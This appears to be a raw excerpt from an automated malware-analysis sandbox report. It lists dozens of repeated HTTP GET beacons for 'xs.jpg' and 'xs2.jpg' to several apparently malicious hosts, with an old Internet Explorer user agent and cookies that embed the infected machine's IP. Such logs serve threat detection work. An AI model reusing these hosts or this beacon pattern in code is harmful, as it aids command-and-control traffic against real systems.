        Source: global trafficHTTP traffic detected: GET /xs.jpg?737daee5=-839468140 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159424|1720159259|4|41|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?215ba763=1119309510 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159424|1720159260|4|41|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?df150ca5=981355486 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?76eabd35=-1523882990 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?2896226b=680927851 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159428|1720159259|4|42|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?e8fd1062=1978557004 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159428|1720159259|4|42|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?bb7b9d3b=846387121 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159429|1720159260|4|42|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?35cb7c96=435346908 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?5428f9c6=-1471024244 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?9c274079=2103526465 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159432|1720159259|4|43|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?e50bb34e=-227213044 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159432|1720159259|4|43|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?78f5da0c=2029378060 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159433|1720159260|4|43|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?d6d21078=-2072628888 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?91c553b8=1192578784 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?3cded4aa=-1441279834 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159436|1720159259|4|44|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?62886082=-988757756 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159437|1720159259|4|44|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?f69d2558=-472420344 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159437|1720159260|4|44|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?a4a56c66=-1532662682 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?832f1280=-1987233920 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?54daef13=-24064711 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159441|1720159259|4|45|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?99af4b5=1289201064 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159441|1720159259|4|45|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?da885230=-1257200544 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159442|1720159260|4|45|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?a9f1e262=1407435972 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?5829e9af=-1051767432 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?25df21c8=788074048 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159445|1720159259|4|46|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?327e2a9f=-118642122 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159446|1720159259|4|46|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?22eaebd4=-1365861596 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159447|1720159260|4|46|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?7dfe147e=-67360516 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?6f42bef3=181614757 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?80947de5=58389342 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159450|1720159259|4|47|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?48dbc808=-1850241008 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159450|1720159259|4|47|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?2c73ccc=186446640 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159451|1720159260|4|47|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?5a80b326=-737830608 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?626616cd=-335646207 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?f260cef5=-685609761 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159454|1720159259|4|48|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?216d3e73=-930122062 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159454|1720159259|4|48|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?9e2ac5aa=2024478376 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159455|1720159260|4|48|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?ef46a9a2=-1402908630 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?37f8d56f=1339359386 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?939b7bae=155214274 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159458|1720159259|4|49|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?67316d6f=898910285 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159459|1720159259|4|49|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?baebcf66=1295391228 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159459|1720159260|4|49|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?6582b518=-1852285480 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1b99da6=86825202 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?9055f4a9=-1873414999 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159463|1720159259|4|50|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?dbb63107=-575567816 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159463|1720159259|4|50|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?c7d4d608=1993464376 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159464|1720159260|4|50|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?787713d7=1515414323 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?8a282b2c=-954651084 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?b3df36a1=1740533058 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159467|1720159259|4|51|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?a62d3528=-1506986712 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159467|1720159259|4|51|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?5f87de0d=2115991604 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159468|1720159260|4|51|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?baaa592=1761595938 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?a5242bcc=-834303444 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?9ad6cfae=1905085726 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159471|1720159259|4|52|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?9f1f7a44=-1743041436 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159472|1720159259|4|52|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?ea3b604f=-1460829892 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159472|1720159260|4|52|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?3fc8f944=1041285988 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?e4bc5c05=1550460958 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?5eb9eca6=-1116481204 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159476|1720159259|4|53|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?35f32514=1810254376 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159476|1720159259|4|53|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?741b0543=1947927875 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159477|1720159260|4|53|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?f3a2ce17=-2074342170 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?a8241ece=-1855376372 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?91387e43=-1405817186 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159481|1720159259|4|54|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?2322230a=-1347768526 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159481|1720159259|4|54|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?5e41367=98833255 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159482|1720159260|4|54|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?8effb8fc=117276892 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1964acc0=1278084672 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?d090ea93=-795809133 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159485|1720159259|4|55|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?9ba60573=343684734 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159485|1720159259|4|55|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?fc675e35=-120669078 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159486|1720159260|4|55|0; snkz=8.46.123.33
